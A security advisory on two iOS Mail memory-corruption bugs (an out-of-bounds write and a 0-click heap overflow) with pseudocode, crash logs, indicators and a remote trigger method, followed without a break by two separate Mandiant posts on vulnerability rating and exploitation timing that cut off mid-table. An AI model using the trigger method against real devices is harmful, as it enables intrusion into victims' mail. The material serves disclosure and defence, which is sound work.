Both the OOB Write bug and the Heap Overflow bug occurred due to the same problem: not handling the return value of the system calls correctly.

The remote bug can be triggered while the downloaded email is being processed; in such a scenario, the email won’t be fully downloaded to the device as a result.

Affected Library: /System/Library/PrivateFrameworks/MIME.framework/MIME

Vulnerable function: -[MFMutableData appendBytes:length:]

Abnormal behavior once the vulnerabilities are exploited

Besides a temporary slowdown of the Mail application, users should not observe any other anomalous behavior. Following an exploit attempt on iOS 12 (whether successful or unsuccessful), users may notice a sudden crash of the Mail application.

On iOS 13, besides a temporary slowdown, it would not be noticeable. Failed attacks would not be noticeable on iOS 13 if another attack is carried out afterwards and deletes the email. 

In failed attacks, the emails sent by the attacker show the message “This message has no content.”, as seen in the picture below:

Crash Forensics Analysis

Part of one of the multiple crashes experienced by the user is as follows.

The crashing instruction was stnp x8, x9, [x3], which stores the values of x8 and x9 to the address held in x3; the process crashed because it accessed the invalid address 0x000000013aa1c000 stored in x3.

Thread 3 Crashed:
0   libsystem_platform.dylib      	0x000000019e671d88 _platform_memmove +88
       0x19e671d84         b.ls 0x00008da8                
       0x19e671d88         stnp x8, x9, [x3]              
       0x19e671d8c         stnp x10, x11, [x3, #16]       
       0x19e671d90         add x3, x3, 0x20               
       0x19e671d94         ldnp x8, x9, [x1]              
1   MIME                          	0x00000001b034c4d8 -[MFMutableData appendBytes:length:] + 356 
2   Message                       	0x00000001b0b379c8 -[MFDAMessageContentConsumer consumeData:length:format:mailMessage:] + 808
Registers:
x0: 0x000000013aa1b05a  x5: 0x0000000000000006
x1: 0x0000000102f0cfc6  x6: 0x0000000000000000
x2: 0x0000000000004a01  x7: 0x0000000000000000
x3: 0x000000013aa1c000  x8: 0x3661614331732f0a
x4: 0x000000000000004b  x9: 0x48575239734c314a

In order to find out why the process crashed, we need to take a look at the implementation of MFMutableData.

The call tree below is taken from a crash log seen only on a limited number of devices.

-[MFDAMessageContentConsumer consumeData:length:format:mailMessage:] 
|
+--  -[MFMutableData appendData:]
   |
   +--  -[MFMutableData appendBytes:length:]
       |
       +-- memmove()

By analyzing the MIME library, we reconstructed the pseudocode of -[MFMutableData appendBytes:length:] as follows:

-(void)appendBytes:(const void*)bytes length:(uint64_t)len{
    //...
    uint64_t new_length = old_length + len;
    [self setLength:new_length];
    if (!self->flush){
        self->flush = true;
    }
    //...
    memmove(dest, bytes, len);
}

The following call stack was executed before the crash happened:

-[MFDAMessageContentConsumer consumeData:length:format:mailMessage:] 
|
+--  -[MFMutableData appendData:]
   |
   +--  -[MFMutableData appendBytes:length:]
       |
       +-- -[MFMutableData setLength:]
          |
          +-- -[MFMutableData _flushToDisk:capacity:]
             |
             +-- ftruncate()

A file is used to store the actual data once the data size reaches a threshold; when the data changes, the content and the size of the mapped file should be adjusted accordingly. The ftruncate() system call is called inside -[MFMutableData _flushToDisk:capacity:] to adjust the size of the mapped file.

Following is the pseudocode of -[MFMutableData _flushToDisk:capacity:]:

- (void)_flushToDisk:(uint64_t)length capacity:(uint64_t)capacity{
    boolean_t flush;
    //...
    if (self->path){
        flush = self->flush; //<-line [a]
    }else{
        //...
        flush = true;
    }
    if(flush){ //<-line [b]
        //...
        ftruncate(self->path, capacity);
        //...
        self->flush = false;
    }
}

The man page of ftruncate specifies:

ftruncate() and truncate() cause the file named by path, or referenced by fildes, to be truncated
 (or extended) to length bytes in size. If the file size exceeds length, any extra data is discarded. 
If the file size is smaller than length, the file is extended and filled with zeros to the indicated 
length.  The ftruncate() form requires the file to be open for writing.
RETURN VALUES
    A value of 0 is returned if the call succeeds.  If the call fails a -1 is returned, and the global 
    variable errno specifies the error.

According to the man page, “If the call fails a -1 is returned, and the global variable errno specifies the error.” This means that under certain conditions this system call can fail to truncate the file and will return an error code instead.

However, upon failure of the ftruncate system call, _flushToDisk continues anyway, which means the mapped file is not extended; execution eventually reaches the memmove() in appendBytes:length:, causing an out-of-bounds (OOB) write past the end of the mmap’ed file.
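For comparison, a defensive version of this step would simply check the return value and stop (or fall back to an in-memory buffer) instead of continuing, so the later memmove() never writes past a file that was not actually extended. The sketch below only illustrates the missing check; it is not Apple’s code.

#include <errno.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>

/* Sketch: grow the mmap'ed backing file, propagating failure to the caller
   instead of silently continuing the way _flushToDisk does. */
static int grow_backing_file(int fd, off_t new_capacity)
{
    if (ftruncate(fd, new_capacity) == -1) {
        fprintf(stderr, "ftruncate failed: %s\n", strerror(errno));
        return -1;   /* caller must not append into the (unchanged) mapping */
    }
    return 0;
}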

Finding another trigger

We know that the crash was due to a failed ftruncate() system call. Does that mean we can’t do anything but wait for the system call to fail?

Let’s take another look at the -[MFMutableData _flushToDisk:capacity:] function.

- (void)_flushToDisk:(uint64_t)length capacity:(uint64_t)capacity{
    boolean_t flush;
    //...
    if (self->path){
        flush = self->flush; //<-line [a]
    }else{
        //...
        flush = true;
    }
    if(flush){ //<-line [b]
        //...
        ftruncate(self->path, capacity);
        //...
        self->flush = false;
    }
}

As you can see at line [b], the code checks whether the flush flag is true before calling ftruncate(). This means that if we can make the flush flag false when it is read at line [a], ftruncate() won’t be executed at all.

If someone calls -[MFMutableData setLength:] (which sets flush to 0) before calling -[MFMutableData appendData:], ftruncate() won’t be executed because flush == 0, and there will be a similar result.

The following backtrace is a demonstration of a local POC. By combining this OOB write with an additional vulnerability and/or methods to control the memory layout, this vulnerability could be triggered remotely – for example by controlling the selectors (as we have observed in other DFIR events, as well as in a Google Project Zero blog post).

Thread 0 Crashed:
0   libsystem_platform.dylib      	0x00000001cc442d98 _platform_memmove  + 88
       0x1cc442d8c         stnp x14, x15, [x0, #16]       
       0x1cc442d90         subs x2, x2, 0x40              
       0x1cc442d94         b.ls 0x00008db8    // 0x00000001cc44bf30 
       0x1cc442d98         stnp x8, x9, [x3]              
       0x1cc442d9c         stnp x10, x11, [x3, #16]       
       0x1cc442da0         add x3, x3, 0x20               
       0x1cc442da4         ldnp x8, x9, [x1]              

1   MIME                          	0x00000001ddbf0518 -[MFMutableData appendBytes:length:]  + 352
       0x1ddbf050c         mov x1, x20                    
       0x1ddbf0510         mov x2, x19                    
       0x1ddbf0514         bl 0x000498f4    // 0x00000001ddc39e08 
       0x1ddbf0518         ldp x29, x30, [sp, #80]        
       0x1ddbf051c         ldp x20, x19, [sp, #64]        
       0x1ddbf0520         ldp x22, x21, [sp, #48]        
       0x1ddbf0524         ldp x24, x23, [sp, #32]        

Although this is indeed a vulnerability that should be patched, we suspect that it was triggered by accident while the attackers were trying to exploit the following vulnerability.

2nd Vulnerability: Remote Heap Overflow in MFMutableData

We continued our investigation into the suspicious remotely triggered events and determined that there is another vulnerability in the same area.

The backtrace can be seen as follows:

-[MFDAMessageContentConsumer consumeData:length:format:mailMessage:] 
|
+--  -[MFMutableData appendData:]
    |
   +--  -[MFMutableData appendBytes:length:]
       |
       +-- -[MFMutableData _mapMutableData]

While analyzing the code flow, we determined the following:

  • The function -[MFDAMessageContentConsumer consumeData:length:format:mailMessage:] gets called when downloading an email in raw MIME form, and will be called multiple times until the email is fully downloaded in Exchange mode. It creates a new NSMutableData object and calls appendData: for any new streaming data that belongs to the same email/MIME message. For other protocols such as IMAP it uses -[MFConnection readLineIntoData:] instead, but the logic and the vulnerability are the same.
  • NSMutableData sets a threshold of 0x200000 bytes; if the data is larger than 0x200000 bytes, it writes the data into a file and then uses the mmap system call to map the file into the device’s memory. The 0x200000-byte threshold is easily exceeded, so every time new data needs to be appended the file is re-mmap’ed, and both the file size and the mmap size keep growing.
  • Remapping is done inside -[MFMutableData _mapMutableData:]; the vulnerability is inside this function.

Pseudocode of the vulnerable function is as follows.

-[MFMutableData _mapMutableData:] calls the function MFMutableData__mapMutableData___block_invoke when the mmap system call fails:

-[MFMutableData _mapMutableData:]
{
  //...
  result = mmap(0LL, v8, v9, 2, v6, 0LL);
  if (result == -1){
      //...
      result = (void *)MFMutableData__mapMutableData___block_invoke(&v21);
  }
  //...
}

The pseudocode of MFMutableData__mapMutableData___block_invoke is as follows: it allocates an 8-byte heap chunk and then replaces the data->bytes pointer with the allocated memory.

void *MFMutableData__mapMutableData___block_invoke(MFMutableData *data)
{
  void *result;

  data->vm = 0;    
  data->length = 0;
  data->capacity = 8; // Reset MFMutableData capacity to 8
  result = calloc(data->capacity, 1); // Allocate a new piece of memory, size of 8
  data->bytes = result; // Replace the mapping memory pointer, which overwrites the -1 left by the mmap failure
  return result;
}

After the execution of -[MFMutableData _mapMutableData:], the process continues execution of -[MFMutableData appendBytes:length:], causing a heap overflow when copying data to the allocated memory.

-[MFMutableData appendBytes:length:] 
{
  int length = [self length];
  //...
  bytes = self->bytes;
  if(!bytes){
     bytes = [self _mapMutableData]; // May now point to an 8-byte heap chunk if mmap failed
  }
  copy_dst = bytes + length;
  //...
  platform_memmove(copy_dst, append_bytes, append_length); // Copies append_length bytes, causing an OOB write past the small heap chunk
}

append_length is the length of a chunk of data from the stream. Since MALLOC_NANO is a very predictable memory region, it is possible to exploit this vulnerability.

An attacker doesn’t need to drain every last bit of memory to cause mmap to fail, since mmap requires a contiguous memory region.

Reproduction

According to the man page of mmap, the call will fail when MAP_ANON is specified and insufficient memory is available.

The goal is to cause mmap to fail; a big enough email will make that happen inevitably. However, we believe that the vulnerabilities can also be triggered using other tricks that exhaust resources. Such tricks can be achieved through multi-part, RTF, and other formats – more on that later.

Another important factor that can affect exploitability is the hardware spec:

  • iPhone 6 has 1GB
  • iPhone 7 has 2GB
  • iPhone X has 3GB

Older devices have less physical RAM and a smaller virtual memory space, hence it is not necessary to drain every last bit of RAM in order to trigger this bug; mmap will fail when it cannot find a contiguous region of the given size in the available virtual memory space.
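A small, self-contained way to observe this is to request one large anonymous mapping and check the result: mmap fails as soon as no contiguous span of the requested size exists in the process’s virtual address space, regardless of how much physical RAM is still free. This sketch is purely illustrative and unrelated to Apple’s code.

#include <stdio.h>
#include <sys/mman.h>

int main(void)
{
    /* Request a single large anonymous region (size chosen arbitrarily for illustration). */
    size_t want = (size_t)1200 * 1024 * 1024;

    void *p = mmap(NULL, want, PROT_READ | PROT_WRITE,
                   MAP_ANON | MAP_PRIVATE, -1, 0);
    if (p == MAP_FAILED)
        perror("mmap");           /* no contiguous region of that size */
    else
        munmap(p, want);
    return 0;
}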

We have determined that macOS is not vulnerable to either of these vulnerabilities.

On iOS 12, it is easier to trigger the vulnerability because the data streaming is done within the same process as the default mail application (MobileMail), which handles many more resources – especially UI rendering – that eat into the available virtual memory space. On iOS 13, MobileMail passes the data streaming to a background process named maild, which concentrates its resources on parsing the emails and thus reduces the risk of the virtual memory space accidentally running out.

Remote Reproduction / POC

Since MobileMail/maild doesn’t explicitly set a maximum limit on email size, it is possible to set up a custom email server and send an email that contains several GB of plain text. The iOS MIME/Message library chunks data into pieces of roughly 0x100000 bytes on average while streaming, so failing to download the entire email is totally fine.

Please note that this is just one example of how to trigger this vulnerability. Attackers do not need to send such an email in order to trigger this vulnerability, and other tricks with multi-part, RTF, or other formats may accomplish the same objective with a standard-size email.

Indicators of Compromise

#   Type of indicator     Purpose                            IOC
1   String in raw email   Part of the malicious email sent   AAAAAAAA AND AAAAATEy AND EA\r\nAABI AND "$\x0e\xce\xa0\xd4\xc7\xcb\x08" AND T8hlGOo9 AND OKl2N\r\nC (updated)
3   String in raw email   Part of the malicious email sent   3r0TRZfh AND AAAAAAAAAAAAAAAA AND \x0041\x0041\x0041\x0041 (unicode AAAA) (updated)
4   String in raw email   Part of the malicious email sent   \n/s1Caa6 AND J1Ls9RWH
5   String in raw email   Part of the malicious email sent   ://44449
6   String in raw email   Part of the malicious email sent   ://84371
7   String in raw email   Part of the malicious email sent   ://87756
8   String in raw email   Part of the malicious email sent   ://94654

Patch

Apple patched both vulnerabilities in the iOS 13.4.5 beta, as can be seen in the screenshot below:

To mitigate these issues, you can use the latest available beta. If using a beta version is not possible, consider disabling the Mail application and using Outlook, Edison Mail, or Gmail, which are not vulnerable.

Disclosure timeline

  • February 19th 2020 – Suspected events reported to the Vendor under ZecOps responsible disclosure policy which allows immediate release for in-the-wild triggers
  • Ongoing communication between the affected vendor & ZecOps
  • March 23rd – ZecOps sent to the affected vendor a POC reproduction of the OOB Write vulnerability
  • March 25th – ZecOps shared a local POC for the OOB Write
  • March 31st – ZecOps confirmed a second vulnerability exists in the same area and the ability of a remote trigger (Remote Heap Overflow) – both vulnerabilities were triggered in the wild
  • March 31st – ZecOps shared a POC with the affected vendor for the remote heap-overflow vulnerability
  • April 7th – ZecOps shared a custom Mail Server to trigger the 0-click heap overflow vulnerability on iOS 13.4 / 13.4.1 easily by simply adding the username & password to Mail and downloading the emails
  • April 15/16th – Vendor patches both vulnerabilities in the publicly available beta
  • April 20th – We re-analyzed historical data and found additional evidence of triggers in the wild on VIPs and targeted personas. We sent an email notifying the vendor that we will have to release this threat advisory imminently in order to enable organizations to safeguard themselves, as attacker(s) will likely increase their activity significantly now that it’s patched in the beta
  • April 22nd – Public disclosure

FAQ

Q: Was the first and/or the second vulnerability exploited in the wild?

A: The suspected emails triggered code paths of both vulnerabilities in the wild, however, we think the first vulnerability (OOB Write) was triggered accidentally, and the main goal was to trigger the second vulnerability (Remote Heap Overflow).

  1. We have seen multiple triggers on the same users across multiple continents. 
  2. We examined the suspicious strings & root cause (such as the 414141…41 events and most of the other events):
    1. We confirmed that this code path does not get randomly triggered.
    2. We confirmed that the register values did not originate from the targeted software or from the operating system.
    3. We confirmed it was not a red-team exercise / POC test.
    4. We confirmed that the controlled pointers containing 414141…41, as well as other controlled memory, were part of the data sent via email to the victim’s device.
  3. We verified that the bugs were remotely exploitable & reproduced the trigger.
  4. We saw similarities between the patterns used against at least a couple of the victims, sent by the same attacker. 
  5. Where possible, we confirmed that the allocation size was intentional.
  6. Lastly, we verified that the suspicious emails were received and processed by the device – according to the stack trace – and should therefore have been present on the device / mail server. Where possible, together with the victims, we verified that the emails had been deleted.

Based on the above, together with other information, we surmise that these vulnerabilities were actively exploited in the wild.

Q: Does an attacker have to trigger the first vulnerability first in order to trigger the second one?

A: No. An attacker would likely target the second vulnerability.

Q: Why are you disclosing these bugs before a full patch is available?

A: It’s important to understand the following:

  • These bugs alone cannot cause harm to iOS users – since the attackers would require an additional infoleak bug & a kernel bug afterwards for full control over the targeted device.
  • Both bugs were already disclosed during the publicly available beta update. The attackers are already aware that the golden opportunity with MobileMail/maild is almost over and they will likely use the time until a patch is available to attack as many devices as possible. 
  • With very limited data we were able to see that at least six organizations were impacted by this vulnerability – and the potential abuse of this vulnerability is enormous. We are confident that a patch must be provided for such issues with public triggers ASAP. 

It is our obligation to the public, our customers, partners, and iOS users globally to disclose these issues so that people who are interested can protect themselves by applying the beta patch, or stop using Mail and temporarily switch to alternatives that are not vulnerable to these bugs. 

We hope that making this information public will help to promote a faster patch.

Q: Can both vulnerabilities be triggered remotely?

A: The remote heap overflow has been proven to be triggerable remotely without any user interaction (aka ‘0-click’) on iOS 13. The OOB write can be triggered remotely with an additional vulnerability that allows calling an arbitrary selector, just like the one published by Google Project Zero here:

https://i.blackhat.com/USA-19/Wednesday/us-19-Silvanovich-Look-No-Hands-The-Remote-Interactionless-Attack-Surface-Of-The-iPhone.pdf – since we saw an in-the-wild trigger for the first vulnerability, it is possible, although we think it was done by mistake (see above).

Q: Are end users required to perform any action for the exploitation to succeed?

A: On iOS 13 – no. On iOS 12 – it requires the victim to click on an email.

If an attacker controls the mail server, the attack can be performed without any clicks on iOS 12 too.

Q: Since when has iOS been vulnerable to these bugs?

A: iOS has been vulnerable to these bugs at least since iOS 6 (September 2012). We haven’t checked earlier versions.

Q: What can you do to mitigate the vulnerability?

A: The newly released beta update of 13.4.5 contains a patch for these vulnerabilities. If you cannot update to this version, consider using other mail applications instead of Mail until a GA patch is available.

Q: Does an attacker need to send a very large email (e.g. 1-3 GB) to trigger the vulnerability?

A: No. Attackers may use tricks in multi-part, RTF, etc. in order to consume the memory in a similar way without sending a large email.

Q: Does the vulnerability require additional information to succeed? 

A: Yes, an attacker would need to leak an address from the memory in order to bypass ASLR. We did not focus on this vulnerability in our research.

Q: What does the vulnerability allow?

A: The vulnerability allows running remote code in the context of MobileMail (iOS 12) or maild (iOS 13). Successful exploitation of this vulnerability would allow the attacker to leak, modify, and delete emails. An additional kernel vulnerability would provide full device access – we suspect that these attackers had another vulnerability. It is currently under investigation.

Q: Would end users notice any abnormal behavior once either vulnerability is triggered / exploited?

A: Besides a temporary slowdown of the Mail application, users should not observe any other anomalous behavior.

When the exploit fails on iOS 12 – users may notice a sudden crash of the Mail application.

On iOS 13, besides a temporary slowdown, it would not be noticeable. Failed attacks would not be noticeable on iOS 13 if another attack is carried out afterwards and deletes the email. In failed attacks, the emails sent by the attacker show the message “This message has no content.”, as seen in the picture below:

Q: If the attackers fail, can they retry the attack using the same vulnerability right after?

A: On iOS 13 – attackers may try multiple times to infect the device silently and without user interaction. On iOS 12 – an additional attempt would require the user to click on a newly received email from the attackers. The victim does not need to open an attachment; just viewing the email is sufficient to trigger the attack. 

Q: Can the attackers delete the received email after it was processed by the device and triggered the vulnerability?

A: Yes

Q: Is macOS vulnerable to these vulnerabilities too? 

A: No


Separating the Signal from the Noise: How Mandiant Intelligence Rates Vulnerabilities — Intelligence for Vulnerability Management, Part Three

One of the critical strategic and tactical roles that cyber threat intelligence (CTI) plays is in the tracking, analysis, and prioritization of software vulnerabilities that could potentially put an organization’s data, employees and customers at risk. In this four-part blog series, FireEye Mandiant Threat Intelligence highlights the value of CTI in enabling vulnerability management, and unveils new research into the latest threats, trends and recommendations.

Every information security practitioner knows that patching vulnerabilities is one of the first steps towards a healthy and well-maintained organization. But with thousands of vulnerabilities disclosed each year and media hype about the newest “branded” vulnerability on the news, it’s hard to know where to start.

The National Vulnerability Database (NVD) considers a range of factors that are fed into an automated process to arrive at a score for CVSSv3. Mandiant Threat Intelligence takes a different approach, drawing on the insight and experience of our analysts (Figure 1). This human input allows for qualitative factors to be taken into consideration, which gives additional focus to what matters to security operations.


Figure 1: How Mandiant Rates Vulnerabilities

Assisting Patch Prioritization

We believe our approach results in a score that is more useful for determining patching priorities, as it allows for the adjustment of ratings based on factors that are difficult to quantify using automated means. It also significantly reduces the number of vulnerabilities rated ‘high’ and ‘critical’ compared to CVSSv3 (Figure 2). We consider critical vulnerabilities to pose significant security risks and strongly suggest that remediation steps are taken to address them as soon as possible. We also believe that limiting ‘critical’ and ‘high’ designations helps security teams to effectively focus attention on the most dangerous vulnerabilities. For instance, from 2016-2019 Mandiant only rated two vulnerabilities as critical, while NVD assigned 3,651 vulnerabilities a ‘critical’ rating (Figure 3).


Figure 2: Criticality of US National Vulnerability Database (NVD) CVSSv3 ratings 2016-2019 compared to Mandiant vulnerability ratings for the same vulnerabilities


Figure 3: Numbers of ratings at various criticality tiers from NVD CVSSv3 scores compared to Mandiant ratings for the same vulnerabilities

Mandiant Vulnerability Ratings Defined

Our rating system includes both an exploitation rating and a risk rating:

The Exploitation Rating is an indication of what is occurring in the wild.


Figure 4: Mandiant Exploitation Rating definitions

The Risk Rating is our expert assessment of what impact an attacker could have on a targeted organization, if they were to exploit a vulnerability.


Figure 5: Mandiant Risk Rating definitions

We intentionally use the critical rating sparingly, typically in cases where exploitation has serious impact, exploitation is trivial with often no real mitigating factors, and the attack surface is large and remotely accessible. When Mandiant uses the critical rating, it is an indication that remediation should be a top priority for an organization due to the potential impacts and ease of exploitation.

For example, Mandiant Threat Intelligence rated CVE-2019-19781 as critical due to the confluence of widespread exploitation—including by APT41—the public release of proof-of-concept (PoC) code that facilitated automated exploitation, the potentially acute outcomes of exploitation, and the ubiquity of the software in enterprise environments.

CVE-2019-19781 is a path traversal vulnerability in the Citrix Application Delivery Controller (ADC) 13.0 that, when exploited, allows an attacker to remotely execute arbitrary code. Due to the nature of these systems, successful exploitation could lead to further compromise of a victim's network through lateral movement or the discovery of Active Directory (AD) and/or LDAP credentials. Though these credentials are often stored as hashes, they have been proven to be vulnerable to password cracking. Depending on the environment, the potential second-order effects of exploiting this vulnerability could be severe.

We described widespread exploitation of CVE-2019-19781 in our blog post earlier this year, including a timeline from disclosure on Dec. 17, 2019, to the patch releases, which began a little over a month later on Jan. 20, 2020. Significantly, within hours of the release of PoC code on Jan. 10, 2020, we detected reconnaissance for this vulnerability in FireEye telemetry data. Within days, we observed weaponized exploits used to gain footholds in victim environments. On the same day the first patches were released, Jan. 20, 2020, we observed APT41, one of the most prolific Chinese groups we track, kick off an expansive campaign exploiting CVE-2019-19781 and other vulnerabilities against numerous targets.

Factors Considered in Ratings

Our vulnerability analysts consider a wide variety of impact-intensifying and mitigating factors when rating a vulnerability. Factors such as actor interest, availability of exploit or PoC code, or exploitation in the wild can inform our analysis, but are not primary elements in rating.

Impact considerations help determine what impact exploitation of the vulnerability can have on a targeted system.

  • Exploitation Consequence: The result of successful exploitation, such as privilege escalation or remote code execution
  • Confidentiality Impact: The extent to which exploitation can compromise the confidentiality of data on the impacted system
  • Integrity Impact: The extent to which exploitation allows attackers to alter information in impacted systems
  • Availability Impact: The extent to which exploitation disrupts or restricts access to data or systems

Mitigating factors affect an attacker’s likelihood of successful exploitation.

  • Exploitation Vector: What methods can be used to exploit the vulnerability?
  • Attacking Ease: How difficult is the exploit to use in practice?
  • Exploit Reliability: How consistently can the exploit execute and perform the intended malicious activity?
  • Access Vector: What type of access (i.e., local, adjacent network, or network) is required to successfully exploit the vulnerability?
  • Access Complexity: How difficult is it to gain the access needed to exploit the vulnerability?
  • Authentication Requirements: Does exploitation require authentication and, if so, what type of authentication?
  • Vulnerable Product Ubiquity: How commonly is the vulnerable product used in enterprise environments?
  • Product's Targeting Value: How attractive is the vulnerable software product or device as a target for threat actors?
  • Vulnerable Configurations: Does exploitation require specific configurations, either default or non-standard?

Mandiant Vulnerability Rating System Applied

The following are examples of cases in which Mandiant Threat Intelligence rated vulnerabilities differently than NVD by considering additional factors and incorporating information that either was not reported to NVD or is not easily quantified in an algorithm.

CVE-2019-12650

  • Description: A command injection vulnerability in the Web UI component of Cisco IOS XE versions 16.11.1 and earlier that, when exploited, allows a privileged attacker to remotely execute arbitrary commands with root privileges
  • NVD rating: High
  • Mandiant rating: Low
  • Explanation: This vulnerability was rated high by NVD, but Mandiant Threat Intelligence rated it as low risk because it requires the highest level of privileges – level 15 admin privileges – to exploit. Because this level of access should be quite limited in enterprise environments, we believe attackers are unlikely to be able to leverage this vulnerability as easily as others. There is no known exploitation of this vulnerability.

CVE-2019-5786

  • Description: A use-after-free vulnerability within the FileReader component in Google Chrome 72.0.3626.119 and prior that, when exploited, allows an attacker to remotely execute arbitrary code
  • NVD rating: Medium
  • Mandiant rating: High
  • Explanation: NVD rated CVE-2019-5786 as medium, while Mandiant Threat Intelligence rated it as high risk. The difference in ratings is likely due to NVD describing the consequences of exploitation as denial of service, while we know of exploitation in the wild that results in remote code execution in the context of the renderer, which is a more serious outcome.

As demonstrated, factors such as the assessed ease of exploitation and the observation of exploitation in the wild may result in a different priority rating than the one issued by NVD. In the case of CVE-2019-12650, we ultimately rated this vulnerability lower than NVD due to the privileges required to exploit it as well as the lack of observed exploitation. On the other hand, we rated CVE-2019-5786 as high risk due to the assessed severity, the ubiquity of the software, and confirmed exploitation.

In early 2019, Google reported two zero-day vulnerabilities being used together in the wild: CVE-2019-5786 (a Chrome zero-day vulnerability) and CVE-2019-0808 (a Microsoft privilege escalation vulnerability). Google quickly released a patch for the Chrome vulnerability and pushed it to users through Chrome’s auto-update feature on March 1. CVE-2019-5786 is significant because it can impact all major operating systems (Windows, macOS, and Linux) and requires only minimal user interaction, such as navigating or following a link to a website hosting exploit code, to achieve remote code execution. The severity is further compounded by a public blog post and proof-of-concept exploit code that were released a few weeks later and subsequently incorporated into a Metasploit module.

The Future of Vulnerability Analysis Requires Algorithms and Human Intelligence

We expect the volume of vulnerabilities to continue to increase in coming years, emphasizing the need for a rating system that accurately identifies the most significant vulnerabilities and provides enough nuance to allow security teams to tackle patching in a focused manner. As the quantity of vulnerabilities grows, incorporating assessments of malicious actor use, that is, observed exploitation as well as the feasibility and relative ease of using a particular vulnerability, will become an even more important factor in making meaningful prioritization decisions.

Mandiant Threat Intelligence believes that the future of vulnerability analysis will involve a combination of machine (structured or algorithmic) and human analysis to assess the potential impact of a vulnerability and the true threat that it poses to organizations. Use of structured algorithmic techniques, which are common in many models, allows for consistent and transparent rating levels, while the addition of human analysis allows experts to integrate factors that are difficult to quantify, and adjust ratings based on real-world experience regarding the actual risk posed by various types of vulnerabilities.

Human curation and enhancement layered on top of automated rating will provide the best of both worlds: speed and accuracy. We strongly believe that paring down alerts and patch information to a manageable number, as well as clearly communicating risk levels with Mandiant vulnerability ratings makes our system a powerful tool to equip network defenders to quickly and confidently take action against the highest priority issues first.

Register today to hear FireEye Mandiant Threat Intelligence experts discuss the latest in vulnerability threats, trends and recommendations in our upcoming April 30 webinar.

Think Fast: Time Between Disclosure, Patch Release and Vulnerability Exploitation — Intelligence for Vulnerability Management, Part Two

One of the critical strategic and tactical roles that cyber threat intelligence (CTI) plays is in the tracking, analysis, and prioritization of software vulnerabilities that could potentially put an organization’s data, employees and customers at risk. In this four-part blog series, FireEye Mandiant Threat Intelligence highlights the value of CTI in enabling vulnerability management, and unveils new research into the latest threats, trends and recommendations. Check out our first post on zero-day vulnerabilities.

Attackers are in a constant race to exploit newly discovered vulnerabilities before defenders have a chance to respond. FireEye Mandiant Threat Intelligence research into vulnerabilities exploited in 2018 and 2019 suggests that the majority of exploitation in the wild occurs before patch issuance or within a few days of a patch becoming available.


Figure 1: Percentage of vulnerabilities exploited at various times in relation to patch release

FireEye Mandiant Threat Intelligence analyzed 60 vulnerabilities that were either exploited or assigned a CVE number between Q1 2018 and Q3 2019. The majority of vulnerabilities were exploited as zero-days – before a patch was available. More than a quarter were exploited within one month after the patch date. Figure 2 illustrates the number of days between when a patch was made available and the first observed exploitation date for each vulnerability.

We believe these numbers to be conservative estimates, as we relied on the first reported exploitation of a vulnerability linked to a specific date. Frequently, first exploitation dates are not publicly disclosed. It is also likely that in some cases exploitation occurred without being discovered before researchers recorded exploitation attached to a certain date.


Figure 2: Time between vulnerability exploitation and patch issuance

Time Between Disclosure and Patch Release

The average time between disclosure and patch availability was approximately 9 days. This average is slightly inflated by vulnerabilities such as CVE-2019-0863, a Microsoft Windows server vulnerability, which was disclosed in December 2018 and not patched until 5 months later in May 2019. The majority of these vulnerabilities, however, were patched quickly after disclosure. In 59% of cases, a patch was released on the same day the vulnerability was disclosed. These metrics, in combination with the observed swiftness of adversary exploitation activity, highlight the importance of responsible disclosure, as it may provide defenders with the slim window needed to successfully patch vulnerable systems.

Exploitation After Patch Release

While the majority of the observed vulnerabilities were zero-days, 42 percent of vulnerabilities were exploited after a patch had been released. For these non-zero-day vulnerabilities, there was a very small window (often only hours or a few days) between when the patch was released and the first observed instance of attacker exploitation. Table 1 provides some insight into the race between attackers attempting to exploit vulnerable software and organizations attempting to deploy the patch.

Time to Exploit for Vulnerabilities First Exploited After a Patch

  • Hours: Two vulnerabilities were successfully exploited within hours of a patch release: CVE-2018-2628 and CVE-2018-7602.
  • Days: 12 percent of vulnerabilities were exploited within the first week following the patch release.
  • One month: 15 percent of vulnerabilities were exploited after one week but within one month of patch release.
  • Years: In multiple cases, such as the first observed exploitation of CVE-2010-1871 and CVE-2012-0874 in 2019, attackers exploited vulnerabilities for which a patch had been made available many years prior.

Table 1: Exploitation timing for patched vulnerabilities ranges from within hours of patch issuance to years after initial disclosure

Case Studies

We continue to observe espionage and financially motivated groups quickly leveraging publicly disclosed vulnerabilities in their operations. The following examples demonstrate the speed with which sophisticated groups are able to incorporate vulnerabilities into their toolsets following public disclosure and the fact that multiple disparate groups have repeatedly leveraged the same vulnerabilities in independent campaigns. Successful operations by these types of groups are likely to have a high potential impact.


Figure 3: Timeline of activity for CVE-2018-15982

CVE-2018-15982: A use after free vulnerability in a file package in Adobe Flash Player 31.0.0.153 and earlier that, when exploited, allows an attacker to remotely execute arbitrary code. This vulnerability was exploited by espionage groups—Russia's APT28 and North Korea's APT37—as well as TEMP.MetaStrike and other financially motivated attackers.


Figure 4: Timeline of activity for CVE-2018-20250

CVE-2018-20250: A path traversal vulnerability exists within the ACE format in the archiver tool WinRAR versions 5.61 and earlier that, when exploited, allows an attacker to locally execute arbitrary code. This vulnerability was exploited by multiple espionage groups, including Chinese, North Korean, and Russian groups, as well as Iranian groups APT33 and TEMP.Zagros.


Figure 5: Timeline of Activity for CVE-2018-4878

CVE-2018-4878: A use after free vulnerability exists within the DRMManager’s “initialize” call in Adobe Flash Player 28.0.0.137 and earlier that, when exploited, allows an attacker to remotely execute arbitrary code. Mandiant Intelligence confirmed that North Korea’s APT37 exploited this vulnerability as a zero-day as early as September 3, 2017. Within 8 days of disclosure, we observed Russia’s APT28 also leverage this vulnerability, with financially motivated attackers and North Korea’s TEMP.Hermit also using it within approximately a month of disclosure.

Availability of PoC or Exploit Code

The availability of PoC or exploit code on its own does not always increase the probability or speed of exploitation. However, we believe that PoC code likely hastens exploitation attempts for vulnerabilities that do not require user interaction. For vulnerabilities that have already been exploited, the subsequent introduction of publicly available exploit or PoC code indicates malicious actor interest and makes exploitation accessible to a wider range of attackers. There were a number of cases in which certain vulnerabilities were exploited on a large scale within 48 hours of PoC or exploit code availability (Table 2).

Time between PoC or exploit code publication and first observed potential exploitation events (product, CVE, FireEye risk rating):

  • 1 day: WinRAR (CVE-2018-20250, Medium); Drupal (CVE-2018-7600, High); Cisco Adaptive Security Appliance (CVE-2018-0296, Medium)
